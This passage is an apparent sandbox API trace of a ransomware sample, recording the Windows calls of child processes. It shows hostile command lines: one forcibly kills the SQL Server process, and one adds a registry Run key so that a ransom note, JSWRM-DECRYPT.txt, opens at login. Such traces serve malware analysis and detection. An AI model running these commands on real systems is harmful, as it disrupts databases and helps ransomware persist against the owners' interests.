_MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0054.351] GetProcessHeap () returned 0x3270000 [0054.351] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3277fa0) returned 1 [0054.351] GetProcessHeap () returned 0x3270000 [0054.351] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xa) returned 0x3277fa0 [0054.351] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0054.353] _get_osfhandle (_FileHandle=1) returned 0x90 [0054.353] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0054.353] _get_osfhandle (_FileHandle=0) returned 0x8c [0054.353] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0054.353] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\taskkill.exe", lpCommandLine="taskkill.exe taskkill /f /im sqlserver.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x2fdf4b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill.exe taskkill /f /im sqlserver.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fdf4fc | out: lpCommandLine="taskkill.exe taskkill /f /im sqlserver.exe", lpProcessInformation=0x2fdf4fc*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x540, dwThreadId=0xdc4)) returned 1 [0054.403] CloseHandle (hObject=0xdc) returned 1 [0054.404] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0054.404] GetProcessHeap () returned 0x3270000 [0054.404] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3276c60) returned 1 [0054.404] GetEnvironmentStringsW () returned 0x3276c60* [0054.404] GetProcessHeap () returned 0x3270000 [0054.404] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xb1a) returned 0x3274bd8 [0054.404] FreeEnvironmentStringsA (penv="=") returned 1 [0054.404] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0061.538] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x2fdf494 | out: lpExitCode=0x2fdf494*=0x1) returned 1 [0061.539] CloseHandle (hObject=0xe0) returned 1 [0061.539] _vsnwprintf (in: _Buffer=0x2fdf57c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2fdf49c | out: _Buffer="00000001") returned 8 [0061.540] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0061.540] GetProcessHeap () returned 0x3270000 [0061.540] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3274bd8) returned 1 [0061.541] GetEnvironmentStringsW () returned 0x3278218* [0061.541] GetProcessHeap () returned 0x3270000 [0061.541] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xb40) returned 0x3274bd8 [0061.541] FreeEnvironmentStringsA (penv="=") returned 1 [0061.541] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0061.541] GetProcessHeap () returned 0x3270000 [0061.541] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3274bd8) returned 1 [0061.541] GetEnvironmentStringsW () returned 0x3278218* [0061.541] GetProcessHeap () returned 0x3270000 [0061.541] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xb40) returned 0x3274bd8 [0061.541] FreeEnvironmentStringsA (penv="=") returned 1 [0061.541] GetProcessHeap () returned 0x3270000 [0061.541] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3277fa0) returned 1 [0061.541] DeleteProcThreadAttributeList (in: lpAttributeList=0x2fdf528 | out: lpAttributeList=0x2fdf528) [0061.541] ??_V@YAXPAX@Z () returned 0x1 [0061.541] _get_osfhandle (_FileHandle=1) returned 0x90 [0061.541] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0061.808] _get_osfhandle (_FileHandle=1) returned 0x90 [0061.808] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0061.964] _get_osfhandle (_FileHandle=1) returned 0x90 [0061.964] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0062.345] _get_osfhandle (_FileHandle=0) returned 0x8c [0062.345] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0062.459] _get_osfhandle (_FileHandle=0) returned 0x8c [0062.459] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0062.608] SetConsoleInputExeNameW () returned 0x1 [0062.608] GetConsoleOutputCP () returned 0x1b5 [0062.723] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0062.723] SetThreadUILanguage (LangId=0x0) returned 0x3060409 [0062.883] exit (_Code=1) [0062.883] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 52 os_tid = 0xf9c Process: id = "11" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x5950000" os_pid = "0xeec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xd04" cmd_line = "reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xf78 [0052.806] GetModuleHandleA (lpModuleName=0x0) returned 0xa40000 [0052.806] __set_app_type (_Type=0x1) [0052.806] __p__fmode () returned 0x77ae3c14 [0052.806] __p__commode () returned 0x77ae49ec [0052.807] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa4c780) returned 0x0 [0052.807] __wgetmainargs (in: _Argc=0xa4d028, _Argv=0xa4d02c, _Env=0xa4d030, _DoWildCard=0, _StartInfo=0xa4d03c | out: _Argc=0xa4d028, _Argv=0xa4d02c, _Env=0xa4d030) returned 0 [0052.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0052.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0052.808] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x2adfbb4 | out: phkResult=0x2adfbb4*=0x0) returned 0x2 [0052.809] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0052.809] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17b68 [0052.809] lstrlenW (lpString="") returned 0 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x2) returned 0x14640 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14378 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17af0 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14138 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14858 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14878 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14898 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17ad8 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x13d18 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x13d38 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x13d58 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x143f8 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17bc8 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14418 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x14438 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x148d8 [0052.809] GetProcessHeap () returned 0x10000 [0052.809] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x148f8 [0052.810] SetThreadUILanguage (LangId=0x0) returned 0x8d0409 [0052.892] GetProcessHeap () returned 0x10000 [0052.892] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17a90 [0052.892] _memicmp (_Buf1=0x17a90, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0052.892] GetProcessHeap () returned 0x10000 [0052.892] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x1e) returned 0x13bb0 [0052.892] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0052.892] GetProcessHeap () returned 0x10000 [0052.892] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17b08 [0052.892] _memicmp (_Buf1=0x17b08, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0052.892] GetProcessHeap () returned 0x10000 [0052.892] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x6c) returned 0x13fd8 [0052.892] _vsnwprintf (in: _Buffer=0x13bb0, _BufferCount=0xe, _Format="|%s|", _ArgList=0x2adfac8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0052.892] _vsnwprintf (in: _Buffer=0x13fd8, _BufferCount=0x35, _Format="|%s|", _ArgList=0x2adfac8 | out: _Buffer="|HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0052.892] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0052.892] lstrlenW (lpString="|HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0052.892] RtlRestoreLastWin32Error () returned 0x8db000 [0052.892] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0052.892] GetProcessHeap () returned 0x10000 [0052.892] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x66) returned 0x141b8 [0052.892] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0052.892] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0052.892] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0052.892] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0052.892] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0052.892] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0052.893] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0052.894] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0052.894] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0052.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0052.894] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0052.894] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0052.894] StrChrIW (lpStart="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" [0052.894] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0052.894] GetProcessHeap () returned 0x10000 [0052.895] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x28) returned 0x14050 [0052.895] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0052.895] RtlRestoreLastWin32Error () returned 0x8db000 [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] RtlRestoreLastWin32Error () returned 0x8db000 [0052.895] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x5c) returned 0x19640 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x88) returned 0x196a8 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14050) returned 1 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14050) returned 0x28 [0052.895] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14050) returned 1 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x141b8) returned 1 [0052.895] GetProcessHeap () returned 0x10000 [0052.895] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x141b8) returned 0x66 [0052.895] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x141b8) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0052.896] lstrlenW (lpString="zapiska") returned 7 [0052.896] GetProcessHeap () returned 0x10000 [0052.896] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17be0 [0052.896] lstrlenW (lpString="zapiska") returned 7 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0052.896] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0052.896] lstrlenW (lpString="C:\\ProgramData\\JSWRM-DECRYPT.txt") returned 32 [0052.896] GetProcessHeap () returned 0x10000 [0052.896] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x42) returned 0x14270 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 3 [0052.896] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-f", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/reg:32", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-reg:32", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/reg:64", cchCount2=-1) returned 3 [0052.897] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-reg:64", cchCount2=-1) returned 3 [0052.897] RtlRestoreLastWin32Error () returned 0x8db000 [0052.897] GetProcessHeap () returned 0x10000 [0052.897] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x13e40 [0052.897] GetProcessHeap () returned 0x10000 [0052.897] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x19860 [0052.897] GetProcessHeap () returned 0x10000 [0052.897] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17aa8 [0052.897] _memicmp (_Buf1=0x17aa8, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0052.897] GetProcessHeap () returned 0x10000 [0052.897] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x200) returned 0x19b40 [0052.897] LoadStringW (in: hInstance=0x0, uID=0x67, lpBuffer=0x19b40, cchBufferMax=256 | out: lpBuffer="ERROR: Invalid syntax.\nType \"REG %s /?\" for usage.\n") returned 0x33 [0052.898] lstrlenW (lpString="ERROR: Invalid syntax.\nType \"REG %s /?\" for usage.\n") returned 51 [0052.898] GetProcessHeap () returned 0x10000 [0052.898] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x68) returned 0x1a250 [0052.898] GetProcessHeap () returned 0x10000 [0052.898] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x14) returned 0x19aa0 [0052.898] GetProcessHeap () returned 0x10000 [0052.898] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x10) returned 0x17b38 [0052.898] _memicmp (_Buf1=0x17b38, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0052.898] GetProcessHeap () returned 0x10000 [0052.898] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x200) returned 0x1a2c0 [0052.898] _vsnwprintf (in: _Buffer=0x1a2c0, _BufferCount=0xff, _Format="ERROR: Invalid syntax.\nType \"REG %s /?\" for usage.\n", _ArgList=0x2adfaec | out: _Buffer="ERROR: Invalid syntax.\nType \"REG ADD /?\" for usage.\n") returned 52 [0052.898] GetLastError () returned 0x800401e4 [0052.898] lstrlenW (lpString="ERROR: Invalid syntax.\nType \"REG ADD /?\" for usage.\n") returned 52 [0052.898] GetProcessHeap () returned 0x10000 [0052.898] GetProcessHeap () returned 0x10000 [0052.898] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14640) returned 1 [0052.898] GetProcessHeap () returned 0x10000 [0052.899] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14640) returned 0x2 [0052.899] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14640) returned 1 [0052.899] GetProcessHeap () returned 0x10000 [0052.899] RtlAllocateHeap (HeapHandle=0x10000, Flags=0xc, Size=0x6a) returned 0x1a4c8 [0052.899] RtlRestoreLastWin32Error () returned 0x8db000 [0052.899] __iob_func () returned 0x77ae2608 [0052.899] _fileno (_File=0x77ae2648) returned 2 [0052.899] _errno () returned 0x2d305b0 [0052.899] _get_osfhandle (_FileHandle=2) returned 0x94 